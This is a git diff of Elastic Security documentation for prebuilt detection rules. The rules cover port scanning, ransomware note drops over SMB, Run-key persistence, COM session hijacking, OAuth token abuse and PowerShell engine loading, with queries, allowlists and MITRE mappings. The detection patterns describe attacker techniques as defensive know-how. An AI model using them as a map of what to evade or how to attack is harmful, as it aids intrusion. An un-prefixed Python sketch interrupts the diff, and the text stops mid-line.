a/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc index 94d7a84300..6582036437 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc @@ -28,7 +28,7 @@ This rule detects potential port scanning activity from a compromised host. 
Port * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -133,6 +133,8 @@ from logs-endpoint.events.network-* host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and + network.direction == "egress" and + destination.port < 32768 and not ( cidr_match(destination.ip, "127.0.0.0/8", "::1", "FE80::/10", "FF00::/8") or process.executable in ( @@ -155,6 +157,7 @@ from logs-endpoint.events.network-* destination.port, process.executable, destination.ip, + source.ip, agent.id, host.name | stats @@ -162,7 +165,8 @@ from logs-endpoint.events.network-* Esql.destination_port_count_distinct = count_distinct(destination.port), Esql.agent_id_count_distinct = count_distinct(agent.id), Esql.host_name_values = values(host.name), - Esql.agent_id_values = values(agent.id) + Esql.agent_id_values = values(agent.id), + Esql.source_ip_values = values(source.ip) by process.executable, destination.ip | where Esql.agent_id_count_distinct == 1 and diff --git a/docs/detections/prebuilt-rules/rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc new file mode 100644 index 0000000000..4d35802ed0 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc @@ -0,0 +1,135 @@ +[[potential-ransomware-behavior-note-files-by-system]] +=== Potential Ransomware Behavior - Note Files by System + +This rule identifies the creation of multiple files with the same name over SMB by the same user. This behavior may indicate the successful remote execution of ransomware dropping ransom note files into different folders. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 211 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Possible investigation steps* + + +- Investigate the content of the dropped files. +- Investigate any file names with unusual extensions. +- Investigate any incoming network connections to port 445 on this host. +- Investigate any network logon events to this host. +- Identify the total number and types of files modified by PID 4 (the System process). +- If the number of files is high and the source.ip connecting over SMB is unusual, isolate the host and block the credentials used. +- Investigate other alerts associated with the user/host during the past 48 hours. + + +*False positive analysis* + + +- Local file modification performed by a kernel-mode driver, which also runs in the context of the System process (PID 4) and can therefore trigger this rule.
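For intuition on the aggregation performed by the ES|QL under Rule query below, here is a minimal Python sketch of the same idea: bucket file-creation events into 60-second windows and count distinct paths per process, file name, and window. The sample events, field names, and the threshold of three distinct paths are illustrative assumptions that mirror the documented query; the sketch is not part of the rule itself.

[source, python]
----------------------------------
"""Illustrative sketch of the rule's 60-second bucketing and distinct-path counting."""
from collections import defaultdict
from datetime import datetime, timezone

# Hypothetical file-creation events (fields loosely mirror the ES|QL keep clause).
EVENTS = [
    {"entity": "system-4", "name": "README_TO_RESTORE.txt",
     "path": rf"C:\Share{i}\README_TO_RESTORE.txt",
     "ts": datetime(2024, 1, 1, 12, 0, i, tzinfo=timezone.utc)}
    for i in range(5)
]

def window(ts: datetime, seconds: int = 60) -> int:
    """Truncate a timestamp to a fixed-size window, like date_trunc(60 seconds, @timestamp)."""
    return int(ts.timestamp()) // seconds

def suspicious_groups(events, min_paths: int = 3):
    """Group by (entity, file name, window) and keep groups with >= min_paths distinct paths."""
    buckets = defaultdict(set)
    for ev in events:
        key = (ev["entity"], ev["name"], window(ev["ts"]))
        buckets[key].add(ev["path"])          # equivalent of count_distinct(file.path)
    return {k: paths for k, paths in buckets.items() if len(paths) >= min_paths}

if __name__ == "__main__":
    for (entity, name, win), paths in suspicious_groups(EVENTS).items():
        print(f"{entity} dropped '{name}' into {len(paths)} distinct paths in window {win}")
----------------------------------

The ES|QL query achieves the same result natively with date_trunc and count_distinct; the sketch is only meant to help reason about the grouping keys and the threshold.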
+ + +*Related rules* + + +- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 +- Potential Ransomware Note File Dropped via SMB - 02bab13d-fb14-4d7c-b6fe-4a28874d37c5 +- Suspicious File Renamed via SMB - 78e9b5d5-7c07-40a7-a591-3dbbf464c386 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- If any backups were affected: + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-* metadata _id, _version, _index + +// filter for file creation event done remotely over SMB with common user readable file types used to place ransomware notes +| where event.category == "file" and host.os.type == "windows" and event.action == "creation" and process.pid == 4 and user.id != "S-1-5-18" and + file.extension in ("txt", "htm", "html", "hta", "pdf", "jpg", "bmp", "png", "pdf") + +// truncate the timestamp to a 60-second window +| eval Esql.time_window_date_trunc = date_trunc(60 seconds, @timestamp) + +| keep file.path, file.name, process.entity_id, Esql.time_window_date_trunc + +// filter for same file name dropped in at least 3 unique paths by the System virtual process +| stats Esql.file_path_count_distinct = COUNT_DISTINCT(file.path), Esql.file_path_values = VALUES(file.path) by process.entity_id , file.name, Esql.time_window_date_trunc +| where Esql.file_path_count_distinct >= 3 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc index 76ce05f2c8..554a814395 100644 --- 
a/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remotemonologue-attack.asciidoc @@ -41,7 +41,7 @@ Identifies attempt to perform session hijack via COM object registry modificatio * Data Source: Sysmon * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -136,7 +136,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and "HKLM\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*" ) or - (process.executable : "C:\\windows\\System32\\msiexec.exe" and user.id : "S-1-5-18") + (process.executable : "C:\\windows\\System32\\msiexec.exe" and ?user.id : "S-1-5-18") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc index 18bbc93fc1..24a21b325c 100644 --- a/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sharepoint-malware-file-upload.asciidoc @@ -7,8 +7,8 @@ Identifies the occurence of files uploaded to SharePoint being detected as Malwa *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: high @@ -16,7 +16,7 @@ Identifies the occurence of files uploaded to SharePoint being detected as Malwa *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies the occurence of files uploaded to SharePoint being detected as Malwa * Tactic: Lateral Movement * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -113,3 +113,15 @@ event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePoint ** Name: Taint Shared Content ** ID: T1080 ** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc index 9aaedae904..324fabac40 100644 --- a/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/startup-or-run-key-registry-modification.asciidoc @@ -33,7 +33,7 @@ Identifies run key or startup key registry modifications. 
In order to survive re * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 117 +*Version*: 118 *Rule authors*: @@ -140,217 +140,34 @@ registry where host.os.type == "windows" and event.type == "change" and not registry.data.strings : "ctfmon.exe /n" and not (registry.value : "Application Restart #*" and process.name : "csrss.exe") and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and - not registry.data.strings : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and - not process.executable : ("?:\\Windows\\System32\\msiexec.exe", "?:\\Windows\\SysWOW64\\msiexec.exe") and - not ( - /* Logitech G Hub */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Logitech Inc" and - ( - process.name : "lghub_agent.exe" and registry.data.strings : ( - "\"?:\\Program Files\\LGHUB\\lghub.exe\" --background", - "\"?:\\Program Files\\LGHUB\\system_tray\\lghub_system_tray.exe\" --minimized" - ) - ) or - ( - process.name : "LogiBolt.exe" and registry.data.strings : ( - "?:\\Program Files\\Logi\\LogiBolt\\LogiBolt.exe --startup", - "?:\\Users\\*\\AppData\\Local\\Logi\\LogiBolt\\LogiBolt.exe --startup" - ) - ) - ) or - - /* Google Drive File Stream, Chrome, and Google Update */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Google LLC" and - ( - process.name : "GoogleDriveFS.exe" and registry.data.strings : ( - "\"?:\\Program Files\\Google\\Drive File Stream\\*\\GoogleDriveFS.exe\" --startup_mode" - ) or - - process.name : "chrome.exe" and registry.data.strings : ( - "\"?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --no-startup-window /prefetch:5", - "\"?:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" --no-startup-window /prefetch:5" - ) or - - process.name : ("GoogleUpdate.exe", "updater.exe") and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\Google\\Update\\*\\GoogleUpdateCore.exe\"", - "\"?:\\Users\\*\\AppData\\Local\\Google\\GoogleUpdater\\*\\updater.exe\" --wake" - ) - ) - ) or - - /* MS Programs */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name in ("Microsoft Windows", "Microsoft Corporation") and - ( - process.name : "msedge.exe" and registry.data.strings : ( - "\"?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start /prefetch:5", - "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --win-session-start", - "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start" - ) or - - process.name : ("Update.exe", "Teams.exe", "ms-teamsupdate.exe") and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Microsoft\\Teams\\Update.exe --processStart \"Teams.exe\" --process-start-args \"--system-initiated\"", - "?:\\ProgramData\\*\\Microsoft\\Teams\\Update.exe --processStart \"Teams.exe\" --process-start-args \"--system-initiated\"", - "ms-teamsupdate.exe -UninstallT20" - ) or - - process.name : ("OneDrive*.exe", "Microsoft.SharePoint.exe") and registry.data.strings : ( - "?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background *", - "?:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe /background*", - "\"?:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe\" /background*", - "\"?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background", - "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\??.???.????.????\\Microsoft.SharePoint.exe", - 
"?:\\Windows\\system32\\cmd.exe /q /c * \"?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\*\"" - ) or - - process.name : "MicrosoftEdgeUpdate.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\Microsoft\\EdgeUpdate\\*\\MicrosoftEdgeUpdateCore.exe\"" - ) or - - process.executable : "?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\Installer\\setup.exe" and - registry.data.strings : ( - "\"?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\Installer\\setup.exe\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon" - ) or - - process.name : "BingWallpaper.exe" and registry.data.strings : ( - "C:\\Users\\*\\AppData\\Local\\Temp\\*\\UnInstDaemon.exe" - ) or - - /* Discord Update.exe via reg.exe */ - process.name : "reg.exe" and registry.data.strings : ( - "\"C:\\Users\\*\\AppData\\Local\\Discord\\Update.exe\" --processStart Discord.exe" - ) - ) - ) or - - /* Slack */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name in ( - "Slack Technologies, Inc.", "Slack Technologies, LLC" - ) and process.name : "slack.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\slack\\slack.exe\" --process-start-args --startup", - "\"?:\\ProgramData\\*\\slack\\slack.exe\" --process-start-args --startup", - "\"?:\\Program Files\\Slack\\slack.exe\" --process-start-args --startup" - ) - ) or - - /* Cisco */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name in ("Cisco WebEx LLC", "Cisco Systems, Inc.") and - ( - process.name : "WebexHost.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\WebEx\\WebexHost.exe\" /daemon /runFrom=autorun" - ) - ) or - ( - process.name : "CiscoJabber.exe" and registry.data.strings : ( - "\"?:\\Program Files (x86)\\Cisco Systems\\Cisco Jabber\\CiscoJabber.exe\" /min" - ) - ) - ) or - - /* Loom */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Loom, Inc." and - process.name : "Loom.exe" and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Programs\\Loom\\Loom.exe --process-start-args \"--loomHidden\"" - ) - ) or - - /* Adobe */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Adobe Inc." 
and - process.name : ("Acrobat.exe", "FlashUtil32_*_Plugin.exe") and registry.data.strings : ( - "\"?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\AdobeCollabSync.exe\"", - "\"?:\\Program Files (x86)\\Adobe\\Acrobat DC\\Acrobat\\AdobeCollabSync.exe\"", - "?:\\WINDOWS\\SysWOW64\\Macromed\\Flash\\FlashUtil32_*_Plugin.exe -update plugin" - ) - ) or - - /* CCleaner */ - ( - process.code_signature.trusted == true and - process.code_signature.subject_name in ("PIRIFORM SOFTWARE LIMITED", "Gen Digital Inc.") and - process.name : ("CCleanerBrowser.exe", "CCleaner64.exe") and registry.data.strings : ( - "\"C:\\Program Files (x86)\\CCleaner Browser\\Application\\CCleanerBrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"Default\"", - "\"C:\\Program Files\\CCleaner\\CCleaner64.exe\" /MONITOR" - ) - ) or - - /* Opera */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Opera Norway AS" and - process.name : ("opera.exe", "assistant_installer.exe") and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera\\launcher.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera\\opera.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera GX\\launcher.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera GX\\opera.exe", - "?:\\Users\\*\\AppData\\Local\\Programs\\Opera\\assistant\\browser_assistant.exe" - ) - ) or - - /* Avast */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Avast Software s.r.o." and - process.name : "AvastBrowser.exe" and registry.data.strings : ( - "\"?:\\Users\\*\\AppData\\Local\\AVAST Software\\Browser\\Application\\AvastBrowser.exe\" --check-run=src=logon --auto-launch-at-startup*", - "\"?:\\Program Files (x86)\\AVAST Software\\Browser\\Application\\AvastBrowser.exe\" --check-run=src=logon --auto-launch-at-startup*", - "" - ) - ) or - - /* Grammarly */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Grammarly, Inc." and - process.name : "GrammarlyInstaller.exe" and registry.data.strings : ( - "?:\\Users\\*\\AppData\\Local\\Grammarly\\DesktopIntegrations\\Grammarly.Desktop.exe", - "\"?:\\Users\\*\\AppData\\Local\\Grammarly\\DesktopIntegrations\\Grammarly.Desktop.exe\"" - ) - ) or - - /* AVG */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "AVG Technologies USA, LLC" and - process.name : "AVGBrowser.exe" and registry.data.strings : ( - "\"C:\\Program Files\\AVG\\Browser\\Application\\AVGBrowser.exe\"*", - "\"C:\\Users\\*\\AppData\\Local\\AVG\\Browser\\Application\\AVGBrowser.exe\"*" - ) - ) or - - /* HP */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "HP Inc." and - process.name : "ScanToPCActivationApp.exe" and registry.data.strings : ( - "\"C:\\Program Files\\HP\\HP*" - ) - ) or - - /* 1Password */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Agilebits" and - process.name : "1PasswordSetup*.exe" and registry.data.strings : ( - "\"C:\\Users\\*\\AppData\\Local\\1Password\\app\\?\\1Password.exe\" --silent" - ) - ) or - - /* OpenVPN */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "OpenVPN Inc." 
and - process.name : "OpenVPNConnect.exe" and registry.data.strings : ( - "C:\\Program Files\\OpenVPN Connect\\OpenVPNConnect.exe --opened-at-login --minimize" - ) - ) or - - /* Docker */ - ( - process.code_signature.trusted == true and process.code_signature.subject_name == "Docker Inc" and - process.name: "com.docker.backend.exe" and registry.data.strings : ( - "C:\\Program Files\\Docker\\Docker\\Docker Desktop.exe -Autostart" - ) - ) - ) + not registry.data.strings : ("*:\\Program Files\\*", + "*:\\Program Files (x86)\\*", + "*:\\Users\\*\\AppData\\Local\\*", + "* --processStart *", + "* --process-start-args *", + "ms-teamsupdate.exe -UninstallT20", + " ", + "grpconv -o", "* /burn.runonce*", "* /startup", + "?:\\WINDOWS\\SysWOW64\\Macromed\\Flash\\FlashUtil32_*_Plugin.exe -update plugin") and + not process.executable : ("?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\SysWOW64\\msiexec.exe", + "D:\\*", + "\\Device\\Mup*", + "C:\\Windows\\SysWOW64\\reg.exe", + "C:\\Windows\\System32\\changepk.exe", + "C:\\Windows\\System32\\netsh.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe", + "C:\\Program Files\\Cisco Spark\\CiscoCollabHost.exe", + "C:\\Sistemas\\Programas MP\\CCleaner\\CCleaner64.exe", + "C:\\Program Files (x86)\\FastTrack Software\\Admin By Request\\AdminByRequest.exe", + "C:\\Program Files (x86)\\Exclaimer Ltd\\Cloud Signature Update Agent\\Exclaimer.CloudSignatureAgent.exe", + "C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoBatteryGaugeAddin\\x64\\QSHelper.exe", + "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\*\\Installer\\setup.exe", + "C:\\ProgramData\\bomgar-scc-*\\bomgar-scc.exe", + "C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil*_pepper.exe", + "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE", + "C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*\\AdobeARM.exe") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc index 81e6269624..7d865f13e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc @@ -33,11 +33,10 @@ Identifies rare occurrences of OAuth workflow for a user principal that is singl * Data Source: Azure * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Sign-In Logs -* Tactic: Defense Evasion * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -113,6 +112,18 @@ event.dataset: azure.signinlogs and *Framework*: MITRE ATT&CK^TM^ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ * Tactic: ** Name: Defense Evasion ** ID: TA0005 @@ -125,3 +136,7 @@ event.dataset: azure.signinlogs and ** Name: Application Access Token ** ID: T1550.001 ** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Technique: +** Name: Impersonation +** ID: T1656 +** Reference URL: https://attack.mitre.org/techniques/T1656/ diff 
--git a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc index f601dbd53a..98ebe35412 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc @@ -35,7 +35,7 @@ Identifies sign-ins on behalf of a principal user to the Microsoft Graph API fro * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -161,3 +161,23 @@ from logs-o365.audit-* ** Name: Application Access Token ** ID: T1550.001 ** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc index 88ecfaff5f..6e2eca0a40 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc @@ -35,7 +35,7 @@ Identifies separate OAuth authorization flows in Microsoft Entra ID where the sa * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -109,7 +109,7 @@ This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled an [source, js] ---------------------------------- -from logs-azure.signinlogs* metadata _id, _version, _index +from logs-azure.signinlogs-* metadata _id, _version, _index | where event.dataset == "azure.signinlogs" and event.outcome == "success" and @@ -218,6 +218,14 @@ from logs-azure.signinlogs* metadata _id, _version, _index ** ID: TA0001 ** Reference URL: https://attack.mitre.org/tactics/TA0001/ * Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: ** Name: Phishing ** ID: T1566 ** Reference URL: https://attack.mitre.org/techniques/T1566/ @@ -225,3 +233,11 @@ from logs-azure.signinlogs* metadata _id, _version, _index ** Name: Spearphishing Link ** ID: T1566.002 ** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc 
b/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc index 794f7897df..29235101f7 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-path-invocation-from-command-line.asciidoc @@ -33,7 +33,7 @@ This rule detects the execution of a PATH variable in a command line invocation * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -135,7 +135,15 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ ---------------------------------- event.category:process and host.os.type:linux and event.type:start and event.action:exec and process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and process.args:-c and -process.command_line:(*PATH=* and not sh*/run/motd.dynamic.new) +process.command_line:*PATH=* and +not ( + process.command_line:(*_PATH=* or *PYTHONPATH=* or sh*/run/motd.dynamic.new) or + process.parent.executable:( + "/opt/puppetlabs/puppet/bin/puppet" or /var/lib/docker/overlay2/* or /vz/root/*/dovecot or + "/usr/libexec/dovecot/auth" or /home/*/.local/share/containers/* or /vz/root/*/dovecot/auth + ) or + process.parent.command_line:"runc init" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc index c67d553fe3..d266f70928 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-powershell-engine-imageload.asciidoc @@ -32,7 +32,7 @@ Identifies the PowerShell engine being invoked by unexpected processes. 
Rather t * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -103,23 +103,42 @@ Attackers can use PowerShell without having to execute `PowerShell.exe` directly [source, js] ---------------------------------- -host.os.type:windows and event.category:library and - dll.name:("System.Management.Automation.dll" or "System.Management.Automation.ni.dll") and +host.os.type:windows and event.category:library and + dll.name:("System.Management.Automation.dll" or "System.Management.Automation.ni.dll") and not ( - process.code_signature.subject_name:("Microsoft Corporation" or "Microsoft Dynamic Code Publisher" or "Microsoft Windows") and process.code_signature.trusted:true and not process.name.caseless:("regsvr32.exe" or "rundll32.exe") - ) and + process.code_signature.subject_name:( + "Microsoft Corporation" or + "Microsoft Dynamic Code Publisher" or + "Microsoft Windows" + ) and process.code_signature.trusted:true and not process.name.caseless:"regsvr32.exe" + ) and not ( - process.executable.caseless:(C\:\\Program*Files*\(x86\)\\*.exe or C\:\\Program*Files\\*.exe) and + process.executable:(C\:\\Program*Files*\(x86\)\\*.exe or C\:\\Program*Files\\*.exe) and process.code_signature.trusted:true - ) and + ) and not ( - process.executable.caseless: C\:\\Windows\\Lenovo\\*.exe and process.code_signature.subject_name:"Lenovo" and + process.executable: C\:\\Windows\\Lenovo\\*.exe and process.code_signature.subject_name:"Lenovo" and process.code_signature.trusted:true - ) and + ) and not ( - process.executable.caseless: "C:\\ProgramData\\chocolatey\\choco.exe" and - process.code_signature.subject_name:"Chocolatey Software, Inc." and process.code_signature.trusted:true - ) and not process.executable.caseless : 